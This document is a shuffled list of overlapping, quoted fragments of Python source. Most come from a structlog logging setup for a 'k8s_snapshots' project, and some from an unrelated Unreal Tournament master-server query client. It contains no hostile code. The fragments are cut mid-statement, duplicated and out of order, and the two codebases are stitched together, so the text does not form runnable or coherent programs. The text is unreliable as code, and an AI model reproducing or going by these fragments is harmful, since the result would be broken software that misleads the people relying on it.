"formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint is",
"return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not None: value =",
"= event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ', '.join(hint for hint",
"return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name,",
"return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is None:",
"str) -> Optional[Any]: value = dict_ for key in key_path.split('.'): if value is",
"message = event_dict.get('message') if message is not None: message = f'{prefix}: {message}, {hint}'",
"'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, )",
"for hint in hints if hint is not None) message = event_dict.get('message') if",
"== 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version':",
"False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, },",
"log level and a timestamp to the event_dict if the log entry #",
"= event_dict.pop('hint', None) if hint is None: return try: return hint.format(**event_dict) except Exception",
"def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is not None and",
"return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order keys for",
"will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if",
"'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '':",
"return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event')",
"= event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record",
"] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config",
"= structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] =",
"return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def",
"if message is not None: message = f'{prefix}: {message}, {hint}' else: message =",
"message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'],",
"method_name, event_dict): event = event_dict.get('event') if event is not None and 'message' not",
"timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(),",
"hint.format(**event_dict) except Exception as exc: return f'! error formatting message: {exc!r}' def path_value(dict_:",
"'.join(hint for hint in hints if hint is not None) message = event_dict.get('message')",
"= structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info,",
"cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is not",
"rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer =",
"try: return hint.format(**event_dict) except Exception as exc: return f'! error formatting message: {exc!r}'",
"method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type,",
"processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event') if",
"if not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if key in",
"return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def",
"= value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if",
"= ', '.join(hint for hint in hints if hint is not None) message",
"return try: return hint.format(**event_dict) except Exception as exc: return f'! error formatting message:",
"value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None:",
"'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors,",
"event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import",
"__structlog__ is not None: value = __structlog__() value = value.get(key) return value def",
"def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if",
"event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record =",
"keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint",
"if the log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name,",
") def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is not None",
"__init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info",
"all(hint is None for hint in hints): if event_dict.get('message') is None: event_dict['message'] =",
"on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of",
"['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level,",
"level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is",
"# is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ]",
"is not None: message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}'",
"timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR'",
"getattr(value, '__structlog__', None) if __structlog__ is not None: value = __structlog__() value =",
"# Make it so that 0 ⇒ None indent = json_indent or None",
"json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ):",
"from k8s_snapshots import events event = event_dict.get('event') if event is None: return event_dict",
"using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict",
"): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str,",
"= getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error",
"in hints if hint is not None) message = event_dict.get('message') if message is",
"else: # Make it so that 0 ⇒ None indent = json_indent or",
"is None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ',",
"event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame,",
"from_hint(ed): hint = event_dict.pop('hint', None) if hint is None: return try: return hint.format(**event_dict)",
"exc: return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str)",
"structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG':",
"timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer()",
"⇒ None indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps )",
"= [ # Add the log level and a timestamp to the event_dict",
"'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers':",
"import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self,",
"level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def",
"def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_ for key",
"in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from",
"['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } }",
"structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level",
"value = value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None)",
"structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level =",
"None) if key_hint is None: return value = path_value(ed, key_hint) return format_kv(key_hint, value)",
"keys for JSON readability when not using json_log=True \"\"\" def processor(logger, method_name, event_dict):",
"the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary",
"method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger,",
"k8s_snapshots import events event = event_dict.get('event') if event is None: return event_dict if",
"'structlog', }, }, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True,",
"f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict",
"return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper()",
"= event_dict.get('message') if message is not None: message = f'{prefix}: {message}, {hint}' else:",
"from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None: return value",
"# <=== else: # Make it so that 0 ⇒ None indent =",
"= message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None,",
"'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version': 1,",
"{ 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', }",
"logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None: return event_dict",
"exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return",
"a timestamp to the event_dict if the log entry # is not from",
"if value is None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is",
"{exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_ for",
"configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO'",
"from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None for hint in hints):",
"when not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict):",
"key_hints = ed.pop('key_hints', None) if key_hints is None: return [] return [ format_kv(key_hint,",
"k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict):",
"from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None for hint in",
"}, }, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter':",
"message is not None: message = f'{prefix}: {message}, {hint}' else: message = f'{prefix}:",
"as exc: return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path:",
"str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ]",
"add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based on the ``hint`` and",
"= [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order),",
"= dict_ for key in key_path.split('.'): if value is None: return __structlog__ =",
"format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key: str, value: Any)",
"formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value =",
"hint in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix",
"renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler',",
"event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event =",
"if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name,",
"] hints += from_key_hints(event_dict) if all(hint is None for hint in hints): if",
"None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ]",
"exc_info is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ =",
"None: value = __structlog__() value = value.get(key) return value def from_key_hint(ed) -> Optional[str]:",
"= exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def",
"if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] =",
"json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO')",
"is not None: value = __structlog__() value = value.get(key) return value def from_key_hint(ed)",
"{message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict def",
"path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key: str, value: Any) ->",
"class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info',",
"``message`` value based on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a",
"bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper =",
"for key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return",
"[] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key:",
"def from_hint(ed): hint = event_dict.pop('hint', None) if hint is None: return try: return",
"event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or",
"str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog(",
"import events event = event_dict.get('event') if event is None: return event_dict if isinstance(event,",
"return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based on",
"for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it so that 0",
"in key_hints ] def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints",
"order_keys(order): \"\"\" Order keys for JSON readability when not using json_log=True \"\"\" def",
"= structlog.dev.ConsoleRenderer() # <=== else: # Make it so that 0 ⇒ None",
"add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: #",
"-> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None: return value =",
"timestamp to the event_dict if the log entry # is not from structlog.",
"'()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level':",
"} } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger,",
"def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event',",
"based on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path",
"hint = ', '.join(hint for hint in hints if hint is not None)",
"= __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates",
"key_path: str) -> Optional[Any]: value = dict_ for key in key_path.split('.'): if value",
"__structlog__() value = value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint',",
"'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate':",
"import structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass",
"is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints",
"Optional, List, Any, Dict import structlog import sys from k8s_snapshots import serialize class",
"key_hint is None: return value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed)",
"= json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [",
"event_dict): record = event_dict.get('_record') if record is None: return event_dict event_dict['function'] = record.funcName",
"None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans,",
"is not None and 'message' not in event_dict: event_dict['message'] = event event_dict['event'] =",
"error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value",
"# Add the log level and a timestamp to the event_dict if the",
"root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers':",
"level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors =",
"root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog':",
"key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict):",
"in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name,",
"{hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent']",
"json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for",
"return value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints",
"method_rame, event_dict): record = event_dict.get('_record') if record is None: return event_dict event_dict['function'] =",
"the event_dict if the log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info,",
"= 'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False,",
"logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event",
"f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is",
"= path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints',",
"value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints",
"import logging import logging.config from collections import OrderedDict from typing import Optional, List,",
"'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream':",
"None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the",
"] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it so",
"{ 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, },",
"): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name:",
"import logging.config from collections import OrderedDict from typing import Optional, List, Any, Dict",
"``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint is None: return",
"is not None) message = event_dict.get('message') if message is not None: message =",
"'message' not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def",
"level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict):",
"not None: value = __structlog__() value = value.get(key) return value def from_key_hint(ed) ->",
"f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'],",
"rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level =",
"event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event') if event is",
"None) if key_hints is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for",
"is None for hint in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event')",
"event_dict.get('event') if event is not None and 'message' not in event_dict: event_dict['message'] =",
"path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None)",
"\"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key",
"a ``message`` value based on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]``",
"in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix =",
"config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None,",
"Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None: return value = path_value(ed,",
"-> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None: return [] return",
"serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info =",
"= getattr(value, '__structlog__', None) if __structlog__ is not None: value = __structlog__() value",
"structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event =",
"'__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__()",
"[ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key: str, value:",
"return event_dict for key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return",
"if event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event'] = event.value return",
"is None: return try: return hint.format(**event_dict) except Exception as exc: return f'! error",
"else: message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging(",
"Optional[Any]: value = dict_ for key in key_path.split('.'): if value is None: return",
"add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else:",
"key_hint in key_hints ] def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}'",
"= ed.pop('key_hint', None) if key_hint is None: return value = path_value(ed, key_hint) return",
"order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make",
"processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event')",
"def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict),",
"Creates a ``message`` value based on the ``hint`` and ``key_hint`` keys. ``key_hint`` :",
"for hint in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict",
"def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name,",
"= event_dict.get('event') if event is not None and 'message' not in event_dict: event_dict['message']",
"structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info",
"in key_path.split('.'): if value is None: return __structlog__ = getattr(value, '__structlog__', None) if",
"prefix = event_dict['event'] hint = ', '.join(hint for hint in hints if hint",
"event_dict.get('message') if message is not None: message = f'{prefix}: {message}, {hint}' else: message",
"return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key: str,",
"= f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message return",
"import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info",
"if all(hint is None for hint in hints): if event_dict.get('message') is None: event_dict['message']"
"import pformat from .unrealserver import UnrealServer # Setup Logger import logging logger =",
"for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in server.info.items() if",
"kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout']",
"logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search",
"poll. port (int): The port number the master server is listening on \"\"\"",
"try: while True: msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg +=",
"wish to poll. port (int): The port number the master server is listening",
"\\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server)",
"UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement",
"def search_servers(self, query): \"\"\" Search for a given query in any of the",
"a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\'",
"{kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\"",
"f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server}",
"hostname self.port = port self.servers = [] if 'logger' not in kwargs: self.logger",
") for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [",
"\"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS name or IP",
"data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def",
"from pprint import pformat from .unrealserver import UnrealServer # Setup Logger import logging",
"the master server is listening on \"\"\" self.hostname = hostname self.port = port",
"hostname (str): Resolvable DNS name or IP address for the Master Server you'd",
"to look for in the dictionary keys Returns: A list of Servers \"\"\"",
"server is listening on \"\"\" self.hostname = hostname self.port = port self.servers =",
"(int): The port number the master server is listening on \"\"\" self.hostname =",
"in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return",
"all servers captured from the Master Server and capture info and status headers.",
"not in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}')",
"[] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in self.servers:",
"running.' ) def search_servers(self, query): \"\"\" Search for a given query in any",
"if not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword",
"else: self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5 else:",
"server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list",
"queries to end clients (whether they be Master Servers # or server clients),",
"for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\")",
"values in the server dict keys. Args: query (str): the search query to",
"query): \"\"\" Search for a given query in any of the values in",
"self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]),",
"Search for a given query in any of the values in the server",
"for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers",
"self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg = self.sock.recv(4096) if len(msg)",
"if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all servers captured",
"import concurrent.futures from pprint import pformat from .unrealserver import UnrealServer # Setup Logger",
"self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname (str):",
"logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class",
"'servers' to a list of Server objects. Returns: None \"\"\" # The Quake",
"except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for",
"statement Args: hostname (str): Resolvable DNS name or IP address for the Master",
"port self.servers = [] if 'logger' not in kwargs: self.logger = logger else:",
"self.servers = [] if 'logger' not in kwargs: self.logger = logger else: self.logger",
"\"\"\" Poll the Master Server for a client list and sets the class",
